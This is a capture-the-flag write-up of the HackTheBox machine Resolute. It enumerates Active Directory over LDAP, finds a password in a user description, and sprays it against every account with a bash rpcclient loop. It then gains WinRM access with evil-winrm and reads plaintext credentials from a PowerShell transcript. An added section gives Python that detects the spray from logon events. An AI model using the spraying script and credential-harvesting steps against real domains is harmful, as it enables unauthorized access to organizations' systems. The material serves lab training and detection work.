
Resolute_HTB

Published 2024/01/03

Overview

  • Resolute is an easy-difficulty Windows machine that features Active Directory.
  • An anonymous bind to Active Directory is used to obtain the password a system administrator set for a new user account.
    • That account's password appears to have been changed afterwards.
    • Password spraying reveals that the password is still in use on another domain user account, which gives access to the system over WinRM.
  • A PowerShell transcript log is found that captured credentials passed on the command line.
    • These are used to move laterally to a user who is a member of the DnsAdmins group.
    • That group has the ability to specify a plugin DLL for the DNS Server service to load.
    • After the DNS service is restarted, commands run on the domain controller in the context of NT AUTHORITY\SYSTEM.

SCAN

nmap

┌──(kali㉿kali)-[~]
└─$ nmap -sV -Pn -T4 10.10.10.169
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-02 20:40 EST
Nmap scan report for 10.10.10.169
Host is up (0.33s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-03 01:49:12Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.11 seconds
  • Assessment
    • Domain: megabank.local
      • With the domain name known, attacks against LDAP look feasible
    • Microsoft Windows Server 2008
      • It is old, so noPac might work too

windapsearch

  • Install
┌──(kali㉿kali)-[~/Resolute]
└─$ git clone https://github.com/ropnop/windapsearch.git
Cloning into 'windapsearch'...
remote: Enumerating objects: 83, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 83 (delta 0), reused 0 (delta 0), pack-reused 69
Receiving objects: 100% (83/83), 44.61 KiB | 1.65 MiB/s, done.
Resolving deltas: 100% (48/48), done.
  • It does not run as-is, so I followed the steps in the README, but it still did not work
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ pip install python-ldap
Defaulting to user installation because normal site-packages is not writeable
Collecting python-ldap
  Downloading python-ldap-3.4.4.tar.gz (377 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━ 377.9/377.9 kB 1.0 MB/s eta 0:00:00
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: pyasn1>=0.3.7 in /usr/lib/python3/dist-packages (from python-ldap) (0.4.8)
Requirement already satisfied: pyasn1-modules>=0.1.5 in /usr/lib/python3/dist-packages (from python-ldap) (0.2.8)
Building wheels for collected packages: python-ldap
  Building wheel for python-ldap (pyproject.toml) ... error
  error: subprocess-exited-with-error
  
  × Building wheel for python-ldap (pyproject.toml) did not run successfully.
  │ exit code: 1
  ╰─> [83 lines of output]
      running bdist_wheel
      running build
      running build_py
      creating build
      creating build/lib.linux-x86_64-cpython-311
      copying Lib/ldapurl.py -> build/lib.linux-x86_64-cpython-311
      copying Lib/ldif.py -> build/lib.linux-x86_64-cpython-311
      creating build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/compat.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/constants.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/functions.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/logger.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/sasl.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/cidict.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/pkginfo.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/dn.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/filter.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/async.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/modlist.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/resiter.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/syncrepl.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/asyncsearch.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/ldapobject.py -> build/lib.linux-x86_64-cpython-311/ldap
      creating build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/deref.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/ppolicy.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/psearch.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/sss.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/pagedresults.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/sessiontrack.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/libldap.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/readentry.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/pwdpolicy.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/vlv.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/simple.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/openldap.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      creating build/lib.linux-x86_64-cpython-311/ldap/extop
      copying Lib/ldap/extop/dds.py -> build/lib.linux-x86_64-cpython-311/ldap/extop
      copying Lib/ldap/extop/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap/extop
      copying Lib/ldap/extop/passwd.py -> build/lib.linux-x86_64-cpython-311/ldap/extop
      creating build/lib.linux-x86_64-cpython-311/ldap/schema
      copying Lib/ldap/schema/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
      copying Lib/ldap/schema/models.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
      copying Lib/ldap/schema/tokenizer.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
      copying Lib/ldap/schema/subentry.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
      creating build/lib.linux-x86_64-cpython-311/slapdtest
      copying Lib/slapdtest/_slapdtest.py -> build/lib.linux-x86_64-cpython-311/slapdtest
      copying Lib/slapdtest/__init__.py -> build/lib.linux-x86_64-cpython-311/slapdtest
      running egg_info
      writing Lib/python_ldap.egg-info/PKG-INFO
      writing dependency_links to Lib/python_ldap.egg-info/dependency_links.txt
      writing requirements to Lib/python_ldap.egg-info/requires.txt
      writing top-level names to Lib/python_ldap.egg-info/top_level.txt
      reading manifest file 'Lib/python_ldap.egg-info/SOURCES.txt'
      reading manifest template 'MANIFEST.in'
      no previously-included directories found matching 'Doc/.build'
      adding license file 'LICENCE'
      writing manifest file 'Lib/python_ldap.egg-info/SOURCES.txt'
      creating build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/README -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/ca.conf -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/ca.pem -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/client.conf -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/client.key -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/client.pem -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/gencerts.sh -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/gennssdb.sh -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/server.conf -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/server.key -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/server.pem -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      running build_ext
      building '_ldap' extension
      creating build/temp.linux-x86_64-cpython-311
      creating build/temp.linux-x86_64-cpython-311/Modules
      x86_64-linux-gnu-gcc -Wsign-compare -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -g -fwrapv -O2 -fPIC -DHAVE_SASL -DHAVE_TLS -DLDAPMODULE_VERSION=3.4.4 "-DLDAPMODULE_AUTHOR=python-ldap project" "-DLDAPMODULE_LICENSE=Python style" -IModules -I/usr/include/python3.11 -c Modules/LDAPObject.c -o build/temp.linux-x86_64-cpython-311/Modules/LDAPObject.o
      In file included from Modules/LDAPObject.c:3:
      Modules/common.h:15:10: fatal error: lber.h: No such file or directory
         15 | #include <lber.h>
            |          ^~~~~~~~
      compilation terminated.
      error: command '/usr/bin/x86_64-linux-gnu-gcc' failed with exit code 1
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for python-ldap
Failed to build python-ldap                                       
ERROR: Could not build wheels for python-ldap, which is required to install pyproject.toml-based projects                           
                                                                  
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ sudo pip install python-ldap
Collecting python-ldap
  Downloading python-ldap-3.4.4.tar.gz (377 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━ 377.9/377.9 kB 3.1 MB/s eta 0:00:00
  Installing build dependencies ... done
^C  Getting requirements to build wheel ... canceled
ERROR: Operation cancelled by user
  • Installing libsasl2-dev with apt-get makes it work
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ sudo apt-get install libsasl2-dev

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following package was automatically installed and is no longer required:
  libaio1
Use 'sudo apt autoremove' to remove it.
The following additional packages will be installed:
  libsasl2-2 libsasl2-modules libsasl2-modules-db libssl-dev
  libssl3 openssl
Suggested packages:
  libsasl2-modules-gssapi-mit | libsasl2-modules-gssapi-heimdal
  libsasl2-modules-ldap libsasl2-modules-otp
  libsasl2-modules-sql libssl-doc
The following NEW packages will be installed:
  libsasl2-dev libssl-dev
The following packages will be upgraded:
  libsasl2-2 libsasl2-modules libsasl2-modules-db libssl3
  openssl
5 upgraded, 2 newly installed, 0 to remove and 1550 not upgraded.
Need to get 6,235 kB of archives.
After this operation, 13.7 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-modules-db amd64 2.1.28+dfsg1-4 [19.4 kB]
Get:2 http://ftp.jaist.ac.jp/pub/Linux/kali kali-rolling/main amd64 libssl3 amd64 3.0.11-1 [2,016 kB]
Get:3 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-2 amd64 2.1.28+dfsg1-4 [56.7 kB]
Get:4 http://ftp-srv2.kddilabs.jp/Linux/packages/kali/kali kali-rolling/main amd64 libssl-dev amd64 3.0.11-1 [2,431 kB]
Get:6 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-modules amd64 2.1.28+dfsg1-4 [65.8 kB]
Get:7 http://ftp-srv2.kddilabs.jp/Linux/packages/kali/kali kali-rolling/main amd64 openssl amd64 3.0.11-1 [1,416 kB]
Get:5 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-dev amd64 2.1.28+dfsg1-4 [230 kB]
Fetched 6,235 kB in 4s (1,732 kB/s)   
(Reading database ... 420821 files and directories currently installed.)
Preparing to unpack .../0-libsasl2-modules-db_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-modules-db:amd64 (2.1.28+dfsg1-4) over (2.1.28+dfsg-10) ...
Preparing to unpack .../1-libssl3_3.0.11-1_amd64.deb ...
Unpacking libssl3:amd64 (3.0.11-1) over (3.0.8-1) ...
Preparing to unpack .../2-libsasl2-2_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-2:amd64 (2.1.28+dfsg1-4) over (2.1.28+dfsg-10) ...
Selecting previously unselected package libssl-dev:amd64.
Preparing to unpack .../3-libssl-dev_3.0.11-1_amd64.deb ...
Unpacking libssl-dev:amd64 (3.0.11-1) ...
Selecting previously unselected package libsasl2-dev.
Preparing to unpack .../4-libsasl2-dev_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-dev (2.1.28+dfsg1-4) ...
Preparing to unpack .../5-libsasl2-modules_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-modules:amd64 (2.1.28+dfsg1-4) over (2.1.28+dfsg-10) ...
Preparing to unpack .../6-openssl_3.0.11-1_amd64.deb ...
Unpacking openssl (3.0.11-1) over (3.0.8-1) ...
Setting up libssl3:amd64 (3.0.11-1) ...
Setting up libsasl2-modules-db:amd64 (2.1.28+dfsg1-4) ...
Setting up libssl-dev:amd64 (3.0.11-1) ...
Setting up libsasl2-2:amd64 (2.1.28+dfsg1-4) ...
Setting up openssl (3.0.11-1) ...
Installing new version of config file /etc/ssl/openssl.cnf.original ...
Setting up libsasl2-modules:amd64 (2.1.28+dfsg1-4) ...
Setting up libsasl2-dev (2.1.28+dfsg1-4) ...
Processing triggers for libc-bin (2.36-9) ...
Processing triggers for man-db (2.11.2-2) ...
Processing triggers for kali-menu (2023.2.3) ...
Scanning processes...                                             
Scanning candidates...                                            
Scanning linux images...                                          

Running kernel seems to be up-to-date.

Restarting services...
 /etc/needrestart/restart.d/systemd-manager
 systemctl restart open-vm-tools.service systemd-journald.service systemd-udevd.service udisks2.service
Service restarts being deferred:
 systemctl restart NetworkManager.service
 /etc/needrestart/restart.d/dbus.service
 systemctl restart docker.service
 systemctl restart lightdm.service
 systemctl restart systemd-logind.service

No containers need to be restarted.

User sessions running outdated binaries:
 kali @ session #2: firefox-esr[35968], lightdm[1251],
  qterminal[1986], vmtoolsd[1601], xfce4-panel[1444],
  xfce4-session[1287]
 kali @ user manager service: at-spi-bus-laun[1368],
  systemd[1257]

No VM guests are running outdated hypervisor (qemu) binaries on
 this host.
                                                                  
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ sudo pip3 install python-ldap    
Collecting python-ldap
  Using cached python-ldap-3.4.4.tar.gz (377 kB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: pyasn1>=0.3.7 in /usr/lib/python3/dist-packages (from python-ldap) (0.4.8)
Requirement already satisfied: pyasn1-modules>=0.1.5 in /usr/lib/python3/dist-packages (from python-ldap) (0.2.8)
Building wheels for collected packages: python-ldap
  Building wheel for python-ldap (pyproject.toml) ... done
  Created wheel for python-ldap: filename=python_ldap-3.4.4-cp311-cp311-linux_x86_64.whl size=369623 sha256=bb454d67a738df7c7910dc2d21a0eadf1a0e14ba58094ae4152d8d0a57a3bff1
  Stored in directory: /root/.cache/pip/wheels/72/59/42/74cab8c1fe6e14c49959206b24b0f87697351eea2ac9787401
Successfully built python-ldap
Installing collected packages: python-ldap
Successfully installed python-ldap-3.4.4
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
  • Information gathering with windapsearch
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ ./windapsearch.py -d megabank.local --dc-ip 10.10.10.169 -U > Users

┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ ./windapsearch.py -d megabank.local --dc-ip 10.10.10.169 -U --full | grep Password
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
description: Account created. Password set to Welcome123!
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
  • Create test.sh
┌──(kali㉿kali)-[~/Resolute]
└─$ cat test.sh 
#!/bin/bash
# Try the password found in the LDAP description attribute against every user
# name extracted from the windapsearch output; print only successful logons.
for u in $(cat ./users | awk -F@ '{print $1}' | awk -F: '{print $2}');
do
        rpcclient -U "$u%Welcome123!" -c "getusername;quit" 10.10.10.169 | grep Authority;
done
  • Run
┌──(kali㉿kali)-[~/Resolute]
└─$ ./test.sh    
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Account Name: melanie, Authority Name: MEGABANK
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Account Name: melanie, Authority Name: MEGABANK
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
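
The spray above leaves a distinctive footprint on the domain controller: a burst of failed logons (Event ID 4625, and 4776 NTLM credential-validation failures) against many different accounts from one source address within seconds, followed by a success for the single account that still uses the password. The following Python is an added detection example for this write-up, not part of the original post or of any tool it uses; the event records are constructed to resemble exported 4625/4624 entries, and the field names (`time`, `event_id`, `target_user`, `source_ip`) are assumptions about the export format.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def _ev(time, event_id, target_user, source_ip):
    """Build one minimal logon record (constructed field names, not a real export)."""
    return {"time": time, "event_id": event_id,
            "target_user": target_user, "source_ip": source_ip}


# Constructed sample, not real telemetry: one source fails against ten different
# accounts within ten seconds and then logs on as "melanie"; a user on another
# host mistypes their own password twice and then succeeds (benign noise).
SAMPLE_EVENTS = (
    [_ev(f"2019-12-03T06:20:{i:02d}", 4625, f"user{i:02d}", "10.10.14.7")
     for i in range(10)]
    + [_ev("2019-12-03T06:20:10", 4624, "melanie", "10.10.14.7")]
    + [_ev("2019-12-03T06:25:00", 4625, "ryan", "10.10.10.50"),
       _ev("2019-12-03T06:25:05", 4625, "ryan", "10.10.10.50"),
       _ev("2019-12-03T06:25:12", 4624, "ryan", "10.10.10.50")]
)


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Flag source IPs whose failed logons (4625) touch at least `min_accounts`
    distinct accounts inside `window`, and list any accounts that then logged on
    successfully (4624) from the same source, which is the highest-value alert."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_src[e["source_ip"]].append(e)

    hits = {}
    for src, evs in by_src.items():
        failures = [e for e in evs if e["event_id"] == 4625]
        for i, first in enumerate(failures):
            t0 = datetime.fromisoformat(first["time"])
            burst = [e for e in failures[i:]
                     if datetime.fromisoformat(e["time"]) - t0 <= window]
            accounts = {e["target_user"] for e in burst}
            if len(accounts) < min_accounts:
                continue
            t_end = datetime.fromisoformat(burst[-1]["time"]) + window
            succeeded = sorted({
                e["target_user"] for e in evs
                if e["event_id"] == 4624
                and t0 <= datetime.fromisoformat(e["time"]) <= t_end})
            hits[src] = {"first_failure": first["time"],
                         "distinct_accounts": len(accounts),
                         "success_after": succeeded}
            break  # one alert per source is enough for triage
    return hits


if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_EVENTS).items():
        print(f"{src}: {info['distinct_accounts']} accounts from "
              f"{info['first_failure']}, then succeeded as "
              f"{info['success_after'] or 'nobody'}")
```

`window` and `min_accounts` need tuning per environment, but a source that fails against many accounts and then succeeds against one is exactly the pattern produced above and deserves the highest priority. The upstream cause is separate: a password stored in an LDAP `description` attribute that an anonymous bind can read, which is a data-hygiene and anonymous-bind configuration problem rather than a detection problem.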

Initial Access

┌──(kali㉿kali)-[~/Resolute]
└─$ evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                               
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion               
                                        
Info: Establishing connection to remote endpoint

Information gathering for lateral movement

*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /all

USER INFORMATION
----------------

User Name        SID
================ ===============================================
megabank\melanie S-1-5-21-1392959593-3013219662-3596683436-10101


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir -force c:\


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-r---        12/4/2019   2:46 AM                Users
d-----        12/4/2019   5:15 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-         1/2/2024   5:47 PM      402653184 pagefile.sys


*Evil-WinRM* PS C:\Users\melanie\Desktop> dir -force c:\PSTranscripts


    Directory: C:\PSTranscripts


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203


*Evil-WinRM* PS C:\Users\melanie\Desktop> dir -force c:\PSTranscripts\20191203


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt


*Evil-WinRM* PS C:\Users\melanie\Desktop> gc c:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
